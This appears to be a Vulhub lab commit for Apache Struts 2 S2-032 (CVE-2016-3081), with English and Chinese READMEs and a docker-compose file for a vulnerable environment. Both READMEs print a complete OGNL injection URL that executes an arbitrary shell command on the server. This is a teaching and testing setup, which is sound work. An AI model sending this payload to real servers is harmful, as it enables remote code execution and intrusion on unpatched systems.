aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
struts2/s2-032/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

36
struts2/s2-032/README.md Normal file
View File

@@ -0,0 +1,36 @@
# S2-032 Remote Code Execution VulnerablityCVE-2016-3081
[中文版本(Chinese version)](README.zh-cn.md)
Affected Version: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)
References:
- https://cwiki.apache.org/confluence/display/WW/S2-032
- https://www.cnblogs.com/mrchang/p/6501428.html
## Setup
Execute the following command to start the Struts2 2.3.28
```
docker compose up -d
```
After the container is running, visit `http://your-ip:8080` that you can see an example page.
## Exploitation
Theres a feature embedded in Struts 2 that lets the "!" (bang) character invoke a method other than execute. It is called “Dynamic Method Invocation” aka DMI.
A simple way to use DMI is to provide HTTP parameters prefixed with `method:`. For example in the URL it could be `/category.action?method:create=foo`, the parameter value is ignored.
The method name of DMI will be evaluated by OGNL expression engine, which would cause the RCE vulnerability.
Visit following URL to trigger the `id` command:
```
http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id
```
![](1.png)

30
struts2/s2-032/README.zh-cn.md Normal file
View File

@@ -0,0 +1,30 @@
# S2-032 远程代码执行漏洞CVE-2016-3081
影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)
漏洞详情:
- https://cwiki.apache.org/confluence/display/WW/S2-032
- https://www.cnblogs.com/mrchang/p/6501428.html
## 漏洞环境
执行如下命令启动struts2 2.3.28
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可看到默认页面。
## 漏洞复现
Struts2在开启了动态方法调用Dynamic Method Invocation的情况下可以使用`method:<name>`的方式来调用名字是`<name>`的方法而这个方法名将会进行OGNL表达式计算导致远程命令执行漏洞。
直接请求如下URL即可执行`id`命令:
```
http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id
```
![](1.png)

6
struts2/s2-032/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
struts2:
image: vulhub/struts2:2.3.28
ports:
- "8080:8080"